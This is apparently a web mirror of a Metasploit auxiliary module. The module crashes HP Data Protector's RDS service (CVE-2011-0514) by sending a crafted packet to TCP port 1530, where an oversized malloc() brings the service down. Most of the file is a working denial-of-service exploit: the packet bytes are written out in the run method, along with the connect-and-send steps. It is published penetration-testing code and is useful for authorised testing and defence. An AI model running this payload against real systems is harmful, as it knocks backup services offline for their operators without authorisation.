Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/hp/data_protector_rds.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'HP Data Protector Manager RDS DOS',
15
'Description' => %q{
16
This module causes a remote DOS on HP Data Protector's RDS service. By sending
17
a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous
18
size for malloc().
19
},
20
'Author' => [
21
'Roi Mallo <rmallof[at]gmail.com>', # initial discovery, poc
22
'sinn3r', # msf
23
],
24
'License' => MSF_LICENSE,
25
'References' => [
26
[ 'CVE', '2011-0514' ],
27
[ 'OSVDB', '70617' ],
28
[ 'EDB', '15940' ],
29
],
30
'DisclosureDate' => '2011-01-08',
31
'Notes' => {
32
'Stability' => [CRASH_SERVICE_DOWN],
33
'SideEffects' => [],
34
'Reliability' => []
35
}
36
)
37
)
38
39
register_options([
40
Opt::RPORT(1530),
41
])
42
end
43
44
def run
45
buf = "\x23\x8c\x29\xb6" # Header
46
buf << "\x64\x00\x00\x00" # Packet size
47
buf << "\x41" * 4 # Data
48
49
connect
50
print_status('Sending malformed packet...')
51
sock.put(buf)
52
disconnect
53
end
54
end
55
56